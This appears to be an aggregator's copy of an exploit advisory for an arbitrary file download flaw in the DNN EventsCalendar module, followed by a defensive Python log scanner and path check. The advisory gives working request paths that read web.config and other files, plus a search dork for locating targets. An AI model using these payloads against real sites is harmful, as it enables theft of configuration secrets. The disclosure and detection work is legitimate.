DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download

CVE: CVE-2020-6533
Category: CWE-16
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2019-01-18
CPE: cpe:cpe:/a:dnnsoftware:eventscalendar_modules:1.x
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
EPSS: 0.37413
EPSSP: 0.9213


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019010186

Below is a copy:

DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download
####################################################################

# Exploit Title : DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : dnnsoftware.com
# Software Information Link : store.dnnsoftware.com/home/product-details/events-calendar
# Software Version : 1.x and All Versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Copyright 2019 by Associated Builders and Contractors'' inurl:''/desktopmodules/eventscalendar/''
# Vulnerability Type : CWE-16  [ Configuration ]

####################################################################

# Description :
************* 

* Events Calendar is a DNN module for adding and displaying events, each with a time and a description entered in a rich-text editor.

* DotNetNuke DNNSoftware Events Calendar Modules 1.x and other versions are prone to a vulnerability that lets attackers download arbitrary files, because the application fails to sufficiently verify user-supplied input.

* This may allow an attacker to gain access to sensitive information, which may aid in launching further attacks.

* An attacker can download and read any file whose path is known by passing it in the '?f=' parameter of downloaddoc.aspx; the '~/' prefix resolves to the application root, so files outside the module's document folder (such as web.config) are served.

# Arbitrary File Download Exploit :
*******************************

/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

/desktopmodules/eventscalendar/downloaddoc.aspx?f=[DOWNLOAD-ANY-FILE]
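As an added defensive example (not part of the advisory or the vendor's code), the Python below parses constructed IIS W3C-style log lines, flags downloaddoc.aspx requests whose f value escapes the module's document folder, and shows the containment check a corrected handler should apply before serving a file. The log field order, the DOC_ROOT path and the sample lines are assumptions.

```python
from urllib.parse import parse_qs, unquote
import posixpath

# Constructed IIS W3C-style log lines (assumed field order:
# date time cs-uri-stem cs-uri-query sc-status c-ip). Not real traffic.
SAMPLE_LOG = """\
2019-01-18 10:00:01 /desktopmodules/eventscalendar/downloaddoc.aspx f=~/web.config 200 203.0.113.5
2019-01-18 10:00:02 /desktopmodules/eventscalendar/downloaddoc.aspx f=agenda.pdf 200 198.51.100.7
2019-01-18 10:00:03 /desktopmodules/eventscalendar/downloaddoc.aspx f=Minutes%202019.pdf 200 198.51.100.7
2019-01-18 10:00:04 /default.aspx - 200 198.51.100.9
"""

# Hypothetical folder that holds the module's legitimate event documents.
DOC_ROOT = "/Portals/0/EventsCalendar/Documents"
ENDPOINT = "/desktopmodules/eventscalendar/downloaddoc.aspx"

def is_safe_download_name(f: str) -> bool:
    """Containment check a corrected handler should apply before serving f:
    reject the '~/' application-root form shown in the advisory, absolute
    paths and backslashes, then require the normalised path to sit directly
    inside DOC_ROOT (which also rejects any '..' traversal)."""
    name = unquote(f)
    if name.startswith(("~", "/", "\\")) or "\\" in name:
        return False
    resolved = posixpath.normpath(posixpath.join(DOC_ROOT, name))
    return posixpath.dirname(resolved) == DOC_ROOT

def find_exploit_attempts(log_text: str):
    """Return (client_ip, decoded f, status) for every downloaddoc.aspx
    request whose f value fails the containment check."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        stem, query, status, ip = parts[2], parts[3], parts[4], parts[5]
        if stem.lower() != ENDPOINT:
            continue
        for f in parse_qs(query).get("f", []):  # parse_qs percent-decodes
            if not is_safe_download_name(f):
                hits.append((ip, unquote(f), status))
    return hits

if __name__ == "__main__":
    for ip, f, status in find_exploit_attempts(SAMPLE_LOG):
        print(f"suspicious download: client={ip} f={f!r} status={status}")
```

A 200 status on a flagged request means the file was actually served, which is the case to escalate; patching the handler with the containment check above and restricting web.config reads are the mitigations.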

####################################################################

# Example Vulnerable Sites :
*************************

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################
